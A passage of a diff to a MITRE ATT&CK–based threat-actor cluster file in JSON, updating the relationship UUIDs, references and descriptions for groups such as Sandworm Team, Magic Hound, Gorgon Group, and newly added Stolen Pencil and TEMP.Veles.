"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "be2dcee9-a7a7-4e38-afd6-21b31ecc3d63", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "9b325b06-35a1-457d-be46-a4ecc0b7ff0c", "tags": [ 
@@ -2161,7 +2379,133 @@ "type": "uses" }, { - "dest-uuid": "11e36d5b-6a92-4bf9-8eb7-85eb24f59e22", + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1f6e3702-7ca1-4582-b2e7-4591297d05a8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "478aa214-2ca7-4ec0-9978-18798e514790", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bd0536d7-b081-43ae-a773-cfb057c5b988", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d54416bd-0803-41ca-870a-ce1af7c05638", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd", + "tags": [ + 
"estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7ba0fc46-197d-466d-8b9f-f1c64d5d81e5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "24b4ce59-eaac-4c8b-8634-9b093b7ccd92", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "fece06b7-d4b1-42cf-b81a-5323c917546e", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "99709758-2b96-48f2-a68a-ad7fbd828091", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2182,70 +2526,70 @@ "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "dest-uuid": "20fb2507-d71c-455d-9b6d-6104461cf26b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f24faf46-3b26-4dbb-98f2-63460498e433", + "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", + "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", + "dest-uuid": "75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "3ffbdc1f-d2bf-41ab-91a2-c7b857e98079", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fece06b7-d4b1-42cf-b81a-5323c917546e", + "dest-uuid": "cd25c1b4-935c-4f0e-ba8d-552f28bc4783", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "9dbdadb6-fdbf-490f-a35f-38762d06a0d2", + "dest-uuid": 
"454fe82d-6fd2-4ac6-91ab-28a33fe01369", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2286,7 +2630,7 @@ "type": "uses" }, { - "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", + "dest-uuid": "e8268361-a599-4e45-bd3f-71c8c7e700c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2307,7 +2651,7 @@ "type": "uses" }, { - "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2321,14 +2665,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "e8268361-a599-4e45-bd3f-71c8c7e700c0", + "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2365,13 +2709,6 @@ ], "type": "uses" }, - { - "dest-uuid": "bb3c1098-d654-4620-bf40-694386d28921", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "cb7bcf6f-085f-41db-81ee-4b68481661b5", "tags": [ @@ -2379,12 +2716,26 @@ ], "type": "uses" }, + { + "dest-uuid": "bb3c1098-d654-4620-bf40-694386d28921", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "463f68f1-5cde-4dc2-a831-68b73488f8f4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + }, + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" } ], "uuid": "c5574ca0-d5a4-490a-b207-e4658e5fd1d7", 
@@ -2418,7 +2769,7 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2432,7 +2783,7 @@ "type": "uses" }, { - "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2470,9 +2821,9 @@ "refs": [ "https://attack.mitre.org/groups/G0034", "https://www.fireeye.com/blog/threat-research/2016/01/ukraine-and-sandworm-team.html", + "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/", "https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf", - "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/", - "https://www.crowdstrike.com/blog/meet-crowdstrikes-adversary-of-the-month-for-january-voodoo-bear/" + "https://www.infosecurity-magazine.com/news/microsoft-zero-day-traced-russian/" ], "synonyms": [ "Sandworm Team", 
@@ -2541,7 +2892,42 @@ "type": "uses" }, { - "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", + "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2561,27 +2947,6 @@ ], "type": "uses" }, - { - "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "92d7da27-2d91-488e-a00c-059dc162766d", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "4b74a1d4-b0e9-4ef1-93f1-14ecc6e2f5b5", "tags": [ 
@@ -2590,14 +2955,14 @@ "type": "uses" }, { - "dest-uuid": "3c4a2599-71ee-4405-ba1e-0e28414b4bc5", + "dest-uuid": "35dd844a-b219-4e2b-a6bb-efa9a75995a9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -2610,26 +2975,12 @@ ], "type": "uses" }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, - { - "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" } ], "uuid": "894aab42-3371-47b1-8859-a4a074c804c8", @@ -2641,11 +2992,11 @@ "external_id": "G0044", "refs": [ "https://attack.mitre.org/groups/G0044", - "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates", "https://securelist.com/winnti-more-than-just-a-game/37029/", "https://securelist.com/games-are-over/70991/", "http://www.novetta.com/wp-content/uploads/2015/04/novetta_winntianalysis.pdf", - "https://401trg.com/burning-umbrella/" + "https://401trg.com/burning-umbrella/", + "http://www.symantec.com/connect/blogs/suckfly-revealing-secret-life-your-code-signing-certificates" ], "synonyms": [ "Winnti Group", @@ -2748,7 +3099,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2769,14 +3120,14 @@ "type": "uses" }, { - "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2801,7 +3152,7 @@ "value": "Gamaredon Group - G0047" }, { - "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Rocket Kitten](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)", + "description": "[Charming Kitten](https://attack.mitre.org/groups/G0058) is an Iranian cyber espionage group that has been active since approximately 2014. They appear to focus on targeting individuals of interest to Iran who work in academic research, human rights, and media, with most victims having been located in Iran, the US, Israel, and the UK. [Charming Kitten](https://attack.mitre.org/groups/G0058) usually tries to access private email and Facebook accounts, and sometimes establishes a foothold on victim computers as a secondary objective. The group's TTPs overlap extensively with another group, [Magic Hound](https://attack.mitre.org/groups/G0059), resulting in reporting that may not distinguish between the two groups' activities. (Citation: ClearSky Charming Kitten Dec 2017)", "meta": { "external_id": "G0058", "refs": [ 
@@ -2838,9 +3189,9 @@ "refs": [ "https://attack.mitre.org/groups/G0059", "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf", "http://www.clearskysec.com/wp-content/uploads/2017/12/Charming_Kitten_2017.pdf", - "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations", - "https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf" + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" ], "synonyms": [ "Magic Hound", @@ -2925,35 +3276,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -2967,35 +3290,7 @@ "type": "uses" }, { - "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f879d51c-5476-431c-aedf-f14d207e4d1e", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3009,7 +3304,42 @@ "type": "uses" }, { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "1608f3e1-598a-42f4-a01a-2e252e81728f", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "707399d6-ab3e-4963-9315-d9d3818cd6a0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3022,6 +3352,76 @@ ], "type": "uses" }, + { + "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b9f5dbe2-4c55-4fc5-af2e-d42c1d182ec4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ 
@@ -3037,49 +3437,14 @@ "type": "uses" }, { - "dest-uuid": "cb69b20d-56d0-41ab-8440-4a4b251614d4", + "dest-uuid": "830c9528-df21-472c-8c14-a036bf17d665", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "dest-uuid": "fbd727ea-c0dc-42a9-8448-9e12962d1ab5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3093,14 +3458,14 @@ "type": "uses" }, { - "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "56fca983-1cf1-4fd1-bda0-5e170a37ab59", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3112,24 +3477,104 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" - }, + } + ], + "uuid": "f9d6633a-55e6-4adc-9263-6ae080421a13", + "value": "Magic Hound - G0059" + }, + { + "description": "[Stolen Pencil](https://attack.mitre.org/groups/G0086) is a threat group likely originating from DPRK that has been active since at least May 2018. The group appears to have targeted academic institutions, but its motives remain unclear.(Citation: Netscout Stolen Pencil Dec 2018)", + "meta": { + "external_id": "G0086", + "refs": [ + "https://attack.mitre.org/groups/G0086", + "https://asert.arbornetworks.com/stolen-pencil-campaign-targets-academia/" + ], + "synonyms": [ + "Stolen Pencil" + ] + }, + "related": [ { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "fbd727ea-c0dc-42a9-8448-9e12962d1ab5", + "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "afc079f3-c0ea-4096-b75d-3f05338b7f60", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "bb5a00de-e086-4859-a231-fa793f6797e2", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "51dea151-0898-4a45-967c-3ebee0420484", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "389735f1-f21c-4208-b8f0-f8031e7169b8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + 
"dest-uuid": "ff6caf67-ea1f-4895-b80e-4bb0fc31c6db", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "20138b9d-1aac-4a26-8654-a36b6bbf2bba", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "6aabc5ec-eae6-422c-8311-38d45ee9838a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" } ], - "uuid": "f9d6633a-55e6-4adc-9263-6ae080421a13", - "value": "Magic Hound - G0059" + "uuid": "7a0d4c09-dfe7-4fa2-965a-1a0e42fedd70", + "value": "Stolen Pencil - G0086" }, { "description": "[Gorgon Group](https://attack.mitre.org/groups/G0078) is a threat group consisting of members who are suspected to be Pakistan-based or have other connections to Pakistan. The group has performed a mix of criminal and targeted attacks, including campaigns against government organizations in the United Kingdom, Spain, Russia, and the United States. (Citation: Unit 42 Gorgon Group Aug 2018)", @@ -3152,21 +3597,7 @@ "type": "uses" }, { - "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", + "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3180,14 +3611,7 @@ "type": "uses" }, { - "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", - "tags": [ - "estimative-language:likelihood-probability=\"almost-certain\"" - ], - "type": "uses" - }, - { - "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], @@ -3208,14 +3632,35 @@ "type": "uses" }, { - "dest-uuid": "970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" }, { - "dest-uuid": "2e0dd10b-676d-4964-acd0-8a404c92b044", + "dest-uuid": "c848fcf7-6b62-4bde-8216-b6c157d48da0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "da04ac30-27da-4959-a67d-450ce47d9470", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3229,7 +3674,28 @@ "type": "uses" }, { - "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", + "dest-uuid": "7cd0bc75-055b-4098-a00e-83dc8beaff14", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "b4d80f8b-d2b9-4448-8844-4bef777ed676", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "9422fc14-1c43-410d-ab0f-a709b76c72dc", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" + }, + { + "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
@@ -3248,17 +3714,172 @@ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "uses" + } + ], + "uuid": "1f21da59-6a13-455b-afd0-d58d0a5a7d27", + "value": "Gorgon Group - G0078" + }, + { + "description": "[TEMP.Veles](https://attack.mitre.org/groups/G0088) is a Russia-based threat group that has targeted critical infrastructure. The group has been observed utilizing TRITON, a malware framework designed to manipulate industrial safety systems.(Citation: FireEye TRITON 2019)(Citation: FireEye TEMP.Veles 2018)(Citation: FireEye TEMP.Veles JSON April 2019)", + "meta": { + "external_id": "G0088", + "refs": [ + "https://attack.mitre.org/groups/G0088", + "https://www.fireeye.com/blog/threat-research/2019/04/triton-actor-ttp-profile-custom-attack-tools-detections.html", + "https://www.fireeye.com/blog/threat-research/2018/10/triton-attribution-russian-government-owned-lab-most-likely-built-tools.html ", + "https://www.fireeye.com/content/dam/fireeye-www/blog/files/TRITON_Appendix_C.html", + "https://dragos.com/resource/xenotime/", + "https://pylos.co/2019/04/12/a-xenotime-to-remember-veles-in-the-wild/" + ], + "synonyms": [ + "TEMP.Veles", + "XENOTIME" + ] + }, + "related": [ + { + "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "uses" }, { - 